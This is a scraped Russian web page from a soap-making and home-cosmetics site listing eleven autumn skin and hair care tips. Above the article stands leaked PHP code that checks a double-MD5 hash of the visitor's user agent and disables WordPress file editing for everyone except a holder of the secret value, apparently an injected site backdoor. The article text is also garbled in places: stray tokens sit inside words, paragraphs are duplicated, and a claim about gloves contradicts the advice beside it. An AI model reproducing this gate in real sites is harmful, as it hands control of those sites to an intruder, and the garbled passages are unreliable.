if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 11 рецептов, которые помогут Вам пережить наступление осени | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

11 рецептов, которые помогут Вам пережить наступление осени

Смена сезона сильно влияет на состояние кожи. Так, после окончания летнего сезона она начинает шелушиться и сохнуть. Сегодня мы дадим 11 рецептов, которые помогут легко адаптироваться к осени и пережить зиму.

Сме­на сезо­на силь­но вли­я­ет на состо­я­ние кожи. Так, после окон­ча­ния лет­не­го сезо­на она начи­на­ет шелу­шить­ся и сох­нуть. Сего­дня мы дадим 11 рецеп­тов, кото­рые помо­гут лег­ко адап­ти­ро­вать­ся к осе­ни и пере­жить зиму.

  1. Дarticle32758ля того, что­бы кожа мень­ше шелу­ши­лась и сох­ла, сле­ду­ет исполь­зо­вать раз­но­об­раз­ные увлаж­ня­ю­щие лосьо­ны для тела или при­ни­мать рас­слаб­ля­ю­щие ван­ны с аро­ма­мас­ла­ми. Реко­мен­ду­ет­ся наде­вать одеж­ду из нату­раль­ных мате­ри­а­лов и ино­гда посе­щать массажиста.
  2. Сред­ства, увлаж­ня­ю­щие кожу, нано­сят­ся за час до выхо­да на ули­цу. Во вре­мя осен­не­го похо­ло­да­ния будет полез­ной деко­ра­тив­ная и мас­ки­ру­ю­щая кос­ме­ти­ка. Гиги­е­ни­че­ская пома­да спа­сет от обвет­ри­ва­ния губ, а тональ­ный крем защи­тит кожу от переохлаждения.
  3. Во вре­мя про­ве­де­ния вод­ных про­це­дур, лежать дол­го в горя­чей воде не сто­ит. Кожа может поте­рять вла­гу, а это допол­ни­тель­ный стресс и так для пере­сох­шей кожи. Опти­маль­ной тем­пе­ра­ту­рой счи­та­ет­ся 37 гра­ду­сов по Цель­сию и не более 15 минут.
  4. Сле­ду­ет сме­нить при­выч­ное мыло на более мяг­кие кос­ме­ти­че­ские сред­ства, как пен­ка для умы­ва­ния, молоч­ко и гель для душа. При­ме­нять скраб для тела необ­хо­ди­мо не чаще одно­го раза в неделю.
  5. Что­бы полу­чить пре­вос­ход­ный резуль­тат поми­мо увлаж­не­ния кожи сна­ру­жи нуж­но напол­нить орга­низм пита­тель­ны­ми веще­ства­ми. В еже­днев­ном раци­оне пита­ния долж­ны быть ово­щи, фрук­ты, и про­дук­ты с необ­хо­ди­мым содер­жа­ни­ем жиров и бел­ков. Для обо­га­ще­ния кожи вита­ми­на­ми не ста­нут лиш­ни­ми допол­ни­тель­ные вита­мин­но-мине­раль­ные комплексы.
  6. Что­бы улуч­шить состо­я­ние кожи и ее обмен­ные про­цес­сы, сле­ду­ет в раци­оне повы­сить упо­треб­ле­ние вита­ми­нов В. Вита­мин А при­даст коже бар­ха­ти­стость и сде­ла­ет ее более эла­стич­ной, а вита­мин Е снаб­дит кожу допол­ни­тель­ным кис­ло­ро­дом и замед­лит ран­нее ста­ре­ние. Каль­ций укре­пит ног­ти и воло­сы, а маг­ний помо­жет пра­виль­но­му пита­нию кле­ток. Но вита­ми­ны есть вита­ми­ны, их сле­ду­ет упо­треб­лять в нату­раль­ном виде и помень­ше в виде полу­фаб­ри­ка­тов и консервантов.
  7. 3Осе­нью, по срав­не­нию с летом, кожа не так кон­так­ти­ру­ет со све­жим воз­ду­хом, как она того тре­бу­ет. Боль­шую часть вре­ме­ни чело­век этой порой про­во­дит в поме­ще­нии, и кожа не может доста­точ­но насы­тить­ся кис­ло­ро­дом. В выход­ные мож­но будет вый­ти про­гу­лять­ся в парк или выехать за город. По доро­ге на рабо­ту или домой пешие про­гул­ки будут доста­точ­но полез­ны не толь­ко для кожи, но и для все­го организма.
  8. Кожа рук так­же нуж­да­ет­ся в допол­ни­тель­ном ухо­де и пита­нии. В эту пору их сто­ит поча­ще бало­вать раз­но­об­раз­ны­ми пита­тель­ны­ми мас­ка­ми и кре­ма­ми, не лиш­ним будет пери­о­ди­че­ски делать мас­саж. Нуж­но зара­нее при­го­то­вить пер­чат­ки и оде­вать их на ули­цу, неза­ви­си­мо от дли­тель­но­сти пре­бы­ва­ния на све­жем воз­ду­хе. Еще в дале­ком XIX веке ни одна насто­я­щая леди не наде­ва­ла пер­чат­ки на улице.
  9. А вот воло­сы стра­да­ют еще боль­ше чем кожа осен­ней порой. Ведь они трав­ми­ру­ют­ся при посто­ян­ном ноше­нии голов­но­го убо­ра, а ведь в холод­ное вре­мя никак не обой­тись без капю­шо­на или шап­ки. При низ­кой тем­пе­ра­ту­ре кро­ве­нос­ные сосу­ды начи­на­ют сужать­ся и кро­во­об­ра­ще­ние в коже голо­вы замед­ля­ет­ся. Когда чело­век вхо­дит в поме­ще­ние и не сни­ма­ет голов­ной убор, кожа голо­вы пере­гре­ва­ет­ся, и воло­сы тем вре­ме­нем не могут дышать. В ито­ге, кор­ни волос посте­пен­но жир­не­ют, кон­чи­ки секут­ся, и воло­сы начи­на­ют выпадать.
  10. Что­бы избе­жать таких непри­ят­но­стей, нуж­но ста­рать­ся хоть ино­гда поль­зо­вать­ся вос­ста­нав­ли­ва­ю­щи­ми баль­за­ма­ми, мас­ка­ми для волос и шам­пу­ня­ми. Если воло­сы лома­ют­ся и элек­три­зу­ют­ся, сле­ду­ет выбро­сить все пласт­мас­со­вые рас­чес­ки. Сто­ить запом­нить, что нель­зя выхо­дить на ули­цу без голов­но­го убо­ра, а в поме­ще­нии его необ­хо­ди­мо снять.
  11. И в кон­це самое глав­ное. Раз­но­об­раз­ные кре­ма, шам­пу­ни, мас­ки помо­гут воло­сам пере­жить осень, но опти­мизм и пози­тив­ное настро­е­ние так­же важ­ны для здо­ро­вья и кра­со­ты. Надо научить­ся поча­ще улы­бать­ся и тогда кра­со­та сохра­нит­ся на дол­гие годы.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Лиана Сергеевна

Так мерзну осенью и зимой, что очень захотелось поделиться с вами рецептами домашней косметики, которую можно сделать своими руками! Читайте все мои записи!